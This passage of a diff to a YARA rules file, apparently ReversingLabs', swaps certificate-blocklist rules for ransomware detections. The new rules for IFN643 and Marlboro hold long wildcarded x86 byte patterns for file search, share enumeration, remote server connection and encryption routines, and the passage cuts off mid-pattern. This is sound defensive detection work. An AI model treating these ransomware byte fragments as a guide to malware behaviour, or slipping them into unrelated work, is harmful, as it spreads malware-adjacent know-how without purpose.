+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 8B 55 ??
+            8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ??
+            8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1
+            ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ??
+            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D
+            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
+            ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ??
+            8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1
+            E0 ?? 8B 4D ?? 8B 54 01 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50
+            8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51
+            8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ??
+            8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIXELPLUS CO., LTD." and pe.signatures [ i ] . serial == "0f:e7:df:6c:4b:9a:33:b8:3d:04:e2:3e:98:a7:7c:ce" and 1396310399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $file_search and $enum_shares and $file_encrypt_1 and $file_encrypt_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_065569A3E261409128A40Affa90D6D10 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_IFN643 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects IFN643 ransomware."
 		author = "ReversingLabs"
-		id = "924c210b-f72a-51eb-af2a-9897faf8f677"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a4d211a7-6735-541e-885d-555bbc11e2cf"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1162-L1178"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.IFN643.yara#L1-L90"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f8d68758704e41325e95ec69334aaf7fabe08a6d5557e0a81bac2f02d3ab5977"
+		logic_hash = "ced234018f1f05601dd3be55eaecd2a1e116ad0b7bb9e0292434f11f19916ebe"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "IFN643"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Police Mutual Aid Association" and pe.signatures [ i ] . serial == "06:55:69:a3:e2:61:40:91:28:a4:0a:ff:a9:0d:6d:10" and 1381795199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0979616733E062C544Df0Abd315E3B92 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "73222a8d-df63-5784-b5a2-0d936db8ddcb"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1180-L1196"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "034b233d6b6dd82ad9fa1ec99db1effa3daaa5bb478d448133c479ac728117ad"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_files_1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B D6 C7 45 ?? ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8
+            ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ??
+            83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ??
+            ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB
+            ?? 0F 84
+        }
+		$search_files_2 = {
+            80 BD ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 75 ?? 33
+            C0 EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 85 ?? ?? ?? ??
+            50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7
+            E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ??
+            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ??
+            ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ??
+            0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ??
+            8B 35 ?? ?? ?? ?? 33 DB 2B CE C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F7 E9 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C1 FA ?? 8B C2 C6 85 ?? ?? ?? ?? ?? C1 E8 ?? 03 C2 74 ?? 33 FF ?? ?? ??
+            8D 45 ?? 8D 0C 37 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 89 45 ?? 8D 45 ?? 0F 43
+            45 ?? C6 00 ?? 8B 35 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B CE 43 F7 E9 83
+            C7 ?? C1 FA ?? 8B C2 C1 E8 ?? 03 C2 3B D8 72 ?? 83 7D ?? ?? 76 ?? 8D 45 ?? B9 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 E9 C1
+            FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
+            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
+            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ??
+            ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83
+            F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ??
+            8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76
+            ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1
+            ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8
+            ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ??
+            83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41
+            ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8
+            ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B C2 89 45 ?? 8B F9 8B 75 ?? 89 75 ??
+            C7 45 ?? ?? ?? ?? ?? 90 3B F8 0F 84 ?? ?? ?? ?? 89 75 ?? C6 45 ?? ?? 85 F6 74 ?? 8B
+            17 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46
+            ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? 8B C6 C6 00 ?? 80 3A ?? 75 ?? 33 C0 EB ?? 8B C2 8D
+            58 ?? 66 90 8A 08 40 84 C9 75 ?? 2B C3 50 52 8B CE E8 ?? ?? ?? ?? 8B 45 ?? 83 C6 ??
+            C6 45 ?? ?? 89 75 ?? 83 C7 ?? EB ?? 8B 55 ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
+            2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9
+            ?? ?? ?? ?? 33 C0 57 8B F9 40 F0 0F C1 05 ?? ?? ?? ?? 75 ?? 56 BE ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C6 ?? 59 81 FE ?? ?? ?? ?? 7C ?? 5E 8B C7 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jessica Karam" and pe.signatures [ i ] . serial == "09:79:61:67:33:e0:62:c5:44:df:0a:bd:31:5e:3b:92" and 1408319999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files_1 and $search_files_2 and $encrypt_files
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7D3250B27E0547C77307030491B42802 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Marlboro : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Marlboro ransomware."
 		author = "ReversingLabs"
-		id = "54073485-e9a5-5a0b-a907-0e8a528da85d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7cd3b436-47e3-5711-9b59-cef70efe3b45"
+		date = "2020-07-23"
+		modified = "2020-07-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1198-L1214"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Marlboro.yara#L1-L117"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "65f036921dfb9cbce3275aefb7111711e50874440096b2e3c3b55190cfc14ddb"
+		logic_hash = "d36c3cf52af47e9f638f58aabc19298e8c58831c3083f82e4c194319503eeaaa"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Marlboro"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Banco do Brasil S.A." and pe.signatures [ i ] . serial == "7d:32:50:b2:7e:05:47:c7:73:07:03:04:91:b4:28:02" and 1412207999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_00D1836Bd37C331A67 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4d99e2ee-823e-568d-88b1-48aaf6d44286"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1216-L1234"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8af1d10085c5be8924eb6e4ea3a9b8e936c7706d8ec43d42f24a9a293c7f9d27"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$ping_apnic = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
+            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_server_connection_1 = {
+            BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
+            C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ??
+            50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+        }
+		$remote_server_connection_2 = {
+            84 C0 74 ?? B3 ?? EB ?? 32 DB C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D
+            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? [0-3] 8B 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6
+            45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B
+            01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0
+        }
+		$remote_server_connection_3 = {
+            50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49
+            ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F
+            43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ??
+            EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 FB ?? 72
+        }
+		$remote_server_connection_4 = {
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
+            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            C6 EB ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33
+            CD E8 ?? ?? ?? ?? 8B E5 5D
+        }
+		$encrypt_file = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 51 C7 45 ?? ?? ?? ?? ?? 8D 55 ??
+            8B 35 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BF ?? ?? ?? ??
+            8B 40 ?? 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 0B C7 EB ?? 03 C8 33 C0 39
+            41 ?? 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
+            75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? EB ?? 03 C8 33 C0 39 41 ??
+            0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 83 EC
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 8D ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8D 64 24 ?? 51 8D 55 ??
+            8B CE E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45
+            ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 74 ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
+            C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8
+            8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
+            45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
+            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
+            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ??
+            ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41
+            ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
